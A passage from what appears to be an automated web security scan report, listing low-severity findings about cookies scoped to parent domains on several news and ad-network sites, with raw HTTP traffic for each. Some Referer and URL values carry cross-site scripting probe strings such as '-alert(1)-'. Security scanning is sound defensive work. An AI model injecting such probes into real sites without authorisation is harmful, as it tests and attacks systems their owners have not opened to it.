GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tireteam.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:37:00 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Location: 404.php
Vary: negotiate,Accept-Encoding
TCN: choice
Set-Cookie: PHPSESSID=400de2bba6a2d859b9262db9a987ee67; path=/; domain=.tireteam.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

12.5. http://www.travelagentcentral.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.travelagentcentral.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSb5663581135df8f6d7f3994b7ed7a15c=f5v89rf77i4c60ioq37m5e6s87; expires=Thu, 26-May-2011 13:52:34 GMT; path=/; domain=.travelagentcentral.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelagentcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSb5663581135df8f6d7f3994b7ed7a15c=f5v89rf77i4c60ioq37m5e6s87; expires=Thu, 26-May-2011 13:52:34 GMT; path=/; domain=.travelagentcentral.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:19:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...

12.6. http://www.we7.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.we7.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=C2BA226107F551E43203D4D8CD0AD0B3; Domain=.we7.com; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.we7.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C2BA226107F551E43203D4D8CD0AD0B3; Domain=.we7.com; Path=/
p3p: policyref="/static/p3p/we7.v1.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa TELi OTPa OUR SAMa OTRa IND UNI COM NAV DEM STA LOC"
ETag: W/"1150-1241020090000"
Last-Modified: Wed, 29 Apr 2009 15:48:10 GMT
Content-Type: image/x-icon;charset=UTF-8
Content-Length: 1150
Date: Tue, 03 May 2011 11:18:48 GMT

............ .h.......(....... ..... ............................................MHHH.................@@@....Z............................TTT.................................FFF.....................44
...[SNIP]...

12.7. http://a.collective-media.net/adj/cm.rev_lee/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.rev_lee/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cli=11fda49064879b2; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 419
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda49064879b2; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:25 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:25 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...

12.8. http://a.tribalfusion.com/displayAd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=atnpe3riItw63PTTfU3jPLZdEIybqZdqMJjTN8yHX8uBTIMUx5F3lA; path=/; domain=.tribalfusion.com; expires=Mon, 01-Aug-2011 15:41:22 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.3&th=23597868812 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Tue, 03 May 2011 15:41:22 GMT
Last-Modified: Tue, 12 Apr 2011 06:33:03 GMT
Expires: Mon, 01 Aug 2011 15:41:22 GMT
Set-Cookie: ANON_ID=atnpe3riItw63PTTfU3jPLZdEIybqZdqMJjTN8yHX8uBTIMUx5F3lA; path=/; domain=.tribalfusion.com; expires=Mon, 01-Aug-2011 15:41:22 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 60

var e9;
if (e9.displayAdFlag == true) {
e9.displayAd();
}

12.9. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=apnsmARkP6tPeCno77TbSlMZcFZb2wrWBA9EWE6SSvoPZa09lardrroK4QWZbZbxcvnSVY9HGKZbDsFCRD; path=/; domain=.tribalfusion.com; expires=Mon, 01-Aug-2011 15:41:24 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=1023893064&th=23597868812&tKey=undefined&size=1x1&p=15218773&a=1&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fd13.zedo.com%2FOzoDB%2Fcutils%2FR53_5%2Fjsc%2F1190%2Fzpu.html%3Fn%3D1190%3Bf%3D1%3Bz%3D2-110&f=2&rnd=15226158 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
Cookie: ANON_ID=aVnpe3pyXawUqiVTFVnZcfSLGE3jd91v3Pk46jsY6hJ00YiZa6nNLg

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnsmARkP6tPeCno77TbSlMZcFZb2wrWBA9EWE6SSvoPZa09lardrroK4QWZbZbxcvnSVY9HGKZbDsFCRD; path=/; domain=.tribalfusion.com; expires=Mon, 01-Aug-2011 15:41:24 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 370

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aomMvfT6rp4Gv2XrYDUPPo4ArePm7B4HrqXWYDmdaN5mBS5V77VcUjWVMgSAJmWWMUTrbP3rPqVa3pTTQlQEBZaQVBZaRFAvSdfdUVMU5U6nndenXEqp2dv
...[SNIP]...

12.10. http://a.triggit.com/pxcwicm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.triggit.com
Path:	/pxcwicm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

trgu=40981ca3-3c73-4c03-808e-d619dec4af1e; domain=.triggit.com; path=/; expires=Tue, 03-May-2016 00:00:00 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pxcwicm HTTP/1.1
Host: a.triggit.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 302 Found
Set-Cookie: trgu=40981ca3-3c73-4c03-808e-d619dec4af1e; domain=.triggit.com; path=/; expires=Tue, 03-May-2016 00:00:00 GMT;
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=530741&ev=40981ca3-3c73-4c03-808e-d619dec4af1e
Date: Tue, 03 May 2011 15:41:32 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting

12.11. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=7192737220943691581; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7192737220943691581; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:31 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:31 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=7192737220943691581&rnd=6976564438829907773&fpid=12&nu=y&t
...[SNIP]...

12.12. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 15:41:37 GMT
rb2=CiMKBjc0MjY5NxjdwenaDCITMzY1ODE5NTk2NjAyOTQxNzk3MBAB; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:37 GMT
vsd=0@1@4dc02231@cdn.turn.com; path=/; domain=.adbrite.com; expires=Thu, 05-May-2011 15:41:37 GMT
rb=0:742697:20828160:3658195966029417970:0; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:37 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=3658195966029417970 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2yMg1rzEsSDbLKa4xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Tue, 03 May 2011 15:41:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 15:41:37 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjdwenaDCITMzY1ODE5NTk2NjAyOTQxNzk3MBAB; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:37 GMT
Set-Cookie: vsd=0@1@4dc02231@cdn.turn.com; path=/; domain=.adbrite.com; expires=Thu, 05-May-2011 15:41:37 GMT
Set-Cookie: rb=0:742697:20828160:3658195966029417970:0; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

12.13. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PRbu=EomEA2WJP;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRgo=BBBAAuILA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1291165C12620110502141348&flash=0&time=2|15:43|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/3/0/%2a/y%3B240437614%3B0-0%3B0%3B42386742%3B4307-300/250%3B41995482/42013269/1%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.300%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.300%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D300%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D2/1/e4/0%3B%7Esscs%3D%3f$CTURL$&r=0.42175230519297324 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

12.14. http://ads.specificmedia.com/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

smu=5013.3585181213909565146; domain=.specificmedia.com; path=/; expires=Wed, 06-Apr-2016 15:42:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462 HTTP/1.1
Host: ads.specificmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: smu=0.0

Response

12.15. http://afe.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adp=7hlD^1^1; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
ug=8KDk18WjAyI1pC; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
smdmp=7hlD:811200901; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
adf=7hlD^0^0; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?l=8610&sz=300x250&wr=j&t=j&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&rnd=576593 HTTP/1.1
Host: afe.specificclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Set-Cookie: adp=7hlD^1^1; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
Set-Cookie: ug=8KDk18WjAyI1pC; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
Set-Cookie: smdmp=7hlD:811200901; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
Set-Cookie: adf=7hlD^0^0; Domain=.specificclick.net; Expires=Wed, 02-May-2012 15:42:09 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Tue, 03 May 2011 15:42:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 583

var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagName(
...[SNIP]...

12.16. http://ak1.abmr.net/is/k.collective-media.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/k.collective-media.net

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-1C30B961A12E6C3C10F68169419EF9635E43541675D98A03E81DDE0F1293867C-355AA514FC933AD582F163FC183349E64FC79FF5AE90EB662836414D5AD43CB4; expires=Wed, 02-May-2012 15:43:28 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/k.collective-media.net?U=%2fcmadj%2fcm.rev_lee%2f%3bsz%3d300x250%3bnet%3dcm%3bord%3d0.3433780161396228%3bord1%3d975335%3bcmpgurl%3dhttp%25253A%2fwww.maysville-online.com%2fcontent%2f%25253Fc3a2e%25252522-alert%252528%25252522DORK%25252522%252529-%25252522f8cf8d87874%25253D1&V=3-KoGBAa68aEiwjHLZ6x3CAYXdUCXfx3mkQODqCBmq6fSIYr4TTOJCeSHSrF%2fBXVv+&I=0B3057BAC5C6A5A&D=collective-media.net&01AD=1&01UE=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: 01AI=2-2-90A822560C1EE65DDB0670744EE82D3BF58FE034DABA2A7CA67E061A7C541F51-D70755CE468497028E8ADE0421D92587626B52FA6456855B8E5B513F26EED2CC

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A/www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1?01AD=3dN_mPzQV5wWLyL9-KrduSWZhUrj4Myt6zzU-rCqFmP8GT4vSLfuxSQ&01RI=0B3057BAC5C6A5A&01NA=
Expires: Tue, 03 May 2011 15:43:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:43:28 GMT
Connection: close
Set-Cookie: 01AI=2-2-1C30B961A12E6C3C10F68169419EF9635E43541675D98A03E81DDE0F1293867C-355AA514FC933AD582F163FC183349E64FC79FF5AE90EB662836414D5AD43CB4; expires=Wed, 02-May-2012 15:43:28 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

12.17. http://ak1.abmr.net/is/tag.contextweb.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.contextweb.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-549E010380BF766569750F59A0B65C26361C220E101E4D3E61AACC2FFB4D695B-09D0C140CBECFEAC70EB1765AEF0C92F4AC8CBEB5F841CEC823E4CC90566AF8A; expires=Wed, 02-May-2012 15:41:25 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.contextweb.com?U=/TagPublish/getad.aspx&V=3-60Vs0dGQN+y3yLXW08J3L5IN2t7V83McyZaoWC%2f1KGddB3RBG0CSUaONwgHIohaz&I=927EA66A3E77DF3&D=contextweb.com&01AD=1&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/getad.aspx?01AD=31Kj9TM6Qoykbq274WAk4OjWjj22EoM-gP8roikptA0xJ713UmjYmlw&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US
Expires: Tue, 03 May 2011 15:41:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:25 GMT
Connection: close
Set-Cookie: 01AI=2-2-549E010380BF766569750F59A0B65C26361C220E101E4D3E61AACC2FFB4D695B-09D0C140CBECFEAC70EB1765AEF0C92F4AC8CBEB5F841CEC823E4CC90566AF8A; expires=Wed, 02-May-2012 15:41:25 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

12.18. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304437337%2E002%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304437337.002,wait-%3E10000,&1304455353873 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; BMX_G=method->-1,ts->1304437337; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304437337%2E002%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

12.19. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
